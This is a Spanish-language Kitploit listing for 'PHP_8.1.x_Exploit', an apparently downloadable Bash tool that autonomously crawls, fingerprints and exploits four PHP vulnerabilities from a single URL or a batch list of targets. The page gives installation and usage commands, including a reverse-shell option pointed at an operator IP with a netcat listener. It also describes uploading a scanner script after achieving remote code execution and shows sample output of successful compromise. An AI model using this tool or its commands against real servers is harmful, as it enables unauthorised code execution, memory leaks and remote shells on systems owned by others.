Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
PHP_8.1.x_Exploit — Detección y explotación automatizadas de vulnerabilidades críticas de PHP (CVE-2024-4577 bypass, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178) | Kitploit
Herramientas/GitHubGitHub/gl1tch0x1/php_8.1.x_exploit
ReconocimientoEscáneres de VulnerabilidadesGeneración de PayloadsExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónComando y ControlCrawlerHerramienta de Acceso Remoto
GitHub
114hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
gl1tch0x1/php_8.1.x_exploit

PHP_8.1.x_Exploit

Detección y explotación automatizadas de vulnerabilidades críticas de PHP (CVE-2024-4577 bypass, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178)

Ver Repositorio
Compartir

🚀 PHP CVE Autopilot

Detección y explotación automatizada de vulnerabilidades críticas de PHP (bypass CVE-2024-4577, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178)

License: GPL v3 Bash

PHP8.1.x_Exploit.sh es una herramienta de evaluación de seguridad de un solo archivo, sin configuración que descubre automáticamente endpoints PHP vulnerables y explota cuatro CVEs de alto impacto que afectan a versiones de PHP anteriores a 8.1.34 (publicada en diciembre de 2024). No requiere ningún crafting manual de payloads – solo proporciona una URL y el script hace el resto, desde el rastreo hasta la ejecución remota de código. Completamente autopiloto – detecta y explota automáticamente sin intervención del usuario.

Características

  • Autopiloto completamente autónomo – dada una sola URL, rastrea, toma huellas, prueba y explota sin interacción del usuario.
  • Escaneo por lotes – introduce una lista de objetivos y ejecuta en paralelo.
  • Rastreo avanzado – extrae enlaces y formularios de la página de inicio para una mejor detección.
  • Huella digital del SO y versión de PHP – evita ataques solo para Windows en Linux, verifica la versión de PHP.
  • Bypass CVE-2024-4577 (Inyección de argumentos CGI en Windows)
    • Detecta y explota endpoints PHP-CGI vulnerables.
    • Reverse shell opcional (PowerShell one‑liner).
    • Dos variantes de inyección: estándar -d y bypass con guion suave %AD.
  • CVE-2025-14177 – fuga de memoria heap mediante getimagesize()
    • Crea dinámicamente un JPEG malformado y lo envía automáticamente a cualquier endpoint de subida descubierto.
    • Detecta memoria filtrada en las respuestas.
  • Escaneo local profundo mediante RCE (cuando se explota CVE-2024-4577)
    • Sube un escáner PHP ligero que prueba:
      • CVE-2025-14180 – desreferencia de puntero NULL en PDO PostgreSQL.
      • CVE-2025-14178 – desbordamiento de entero en array_merge.
  • Rastreo inteligente – extrae enlaces y formularios para descubrir scripts CGI y páginas de subida.
  • Ejecución en paralelo – usa parallel si está disponible, sino funciona correctamente.
  • Modos verbose y debug – ve cada petición HTTP y cada decisión.
  • Generación de informes – guarda todos los hallazgos en un archivo de texto.
  • Limpio y seguro – los archivos temporales se destruyen al salir, los timeouts evitan bloqueos.

Requisitos

DependenciaPropósito¿Normalmente instalado?
bash 4.0+Intérprete de scriptsSí (Linux/macOS)
curlPeticiones HTTPSí
grep, sed, awkProcesamiento de textoSí
mktempCreación de archivos temporalesSí
(opcional) parallelEscaneo por lotes más rápidoNo (pero recomendado)
(opcional) jqFormateo de salida JSONNo

No se requieren privilegios de root – la herramienta solo envía peticiones HTTP y opcionalmente ejecuta un reverse shell (requiere un listener en tu máquina).

Instalación

git clone https://github.com/gl1tch0x1/PHP_8.1.x_Exploit.git
cd PHP_8.1.x_Exploit
chmod +x PHP8.1.x_Exploit.sh

Uso

Objetivo único (más común)

./PHP8.1.x_Exploit.sh -u http://target.example.com

Objetivo único con reverse shell (CVE-2024-4577)

./PHP8.1.x_Exploit.sh -u http://vulnerable-win-server.local/ --revshell 192.168.1.100 4444

Luego en tu máquina:

nc -lvnp 4444

Escaneo por lotes de múltiples objetivos

./PHP8.1.x_Exploit.sh -l targets.txt --threads 10

Ejemplo targets.txt:

http://192.168.1.1/
https://10.0.0.5:8080/
http://internal-app.company.com

Modo solo escaneo (sin intentos de explotación)

./PHP8.1.x_Exploit.sh -u http://target.com/ --scan-only

Guardar informe en archivo

./PHP8.1.x_Exploit.sh -u http://target.com/ -o results.txt

Salida verbose / debug

./PHP8.1.x_Exploit.sh -u http://target.com/ --verbose
./PHP8.1.x_Exploit.sh -u http://target.com/ --debug   # muy ruidoso

Cómo funciona (fases)

FaseAcción
1Huella digital – SO y versión de PHP a partir de cabeceras y sondeos.
2Rastreo – extrae atributos href y action de la página de inicio.
3Descubrimiento de CGI – prueba rutas comunes y enlaces rastreados que parecen CGI.
4Prueba de CVE‑2024‑4577 – inyecta payloads -d y %AD; si tiene éxito, ejecuta comandos o envía reverse shell.
5Descubrimiento de endpoints de subida – verifica rutas de subida comunes y formularios que contengan "upload"/"image".
6Prueba de CVE‑2025‑14177 – crea un JPEG malformado, lo envía por POST a cada endpoint de subida, detecta fugas de heap.
7Escaneo interno profundo – si se logra RCE, sube un script PHP escáner y lo ejecuta para probar CVE‑2025‑14180 / CVE‑2025‑14178.
8Informe – imprime un resumen y opcionalmente escribe en un archivo.

Opciones de línea de comandos (referencia completa)

OpciónDescripción
-u URLURL de un solo objetivo (ej. http://example.com/)
-l FILEArchivo por lotes con una URL por línea
--scan-onlySolo detectar – no explotar (sin reverse shell, sin subidas de payload)
-o FILEEscribir informe final en FILE
--threads NNúmero de hilos paralelos para escaneo por lotes (predeterminado: 5)
--timeout NTiempo de espera HTTP en segundos (predeterminado: 10)
--no-colorDeshabilitar salida coloreada
--verboseMostrar progreso detallado
--debugMostrar cada petición HTTP (puede exponer datos sensibles)
--revshell IP PORTIntentar reverse shell cuando se encuentre CVE‑2024‑4577
-h, --helpMostrar ayuda y salir

CVEs cubiertos en detalle

CVEGravedadImpactoVector de explotaciónCorregido en
CVE‑2024‑4577 (bypass)CríticoRCEInyección de argumentos CGI en Windows (mapeo de guion suave)PHP 8.1.34
CVE‑2025‑14177Media/AltaFuga de información (memoria heap)JPEG malformado pasado a getimagesize()PHP 8.1.34
CVE‑2025‑14180AltaDoS (desreferencia NULL)PDO PostgreSQL con prepares emulados + parámetro malformado \x99PHP 8.1.34
CVE‑2025‑14178Alta (8.2)DoS / posible corrupción de memoriaarray_merge() con arrays enormes causando desbordamiento de enteroPHP 8.1.34

Nota: CVE‑2025‑14180 y CVE‑2025‑14178 solo pueden detectarse con precisión desde dentro del servidor (pruebas locales). El script logra esto subiendo un escáner después de un exploit CGI exitoso.

📸 Ejemplo de salida

[*] Scanning: http://192.168.1.100/
[*] OS: windows
[*] PHP version: 8.1.33
[*] Testing CVE-2024-4577 on http://192.168.1.100/cgi-bin/php-cgi.exe
[✓] CVE-2024-4577: VULNERABLE (soft hyphen injection)
[*] Attempting reverse shell to 192.168.1.5 4444
...
[*] Testing CVE-2025-14177 via http://192.168.1.100/upload.php
[-] CVE-2025-14177: Potential heap leak detected!
...
[*] Running deep local scan via RCE...
PHP_VERSION=8.1.33
CVE-2025-14180: VULNERABLE
CVE-2025-14178: VULNERABLE
CVE-2025-14177: VULNERABLE (leak: 486561704c65616b21...)
Descargar herramienta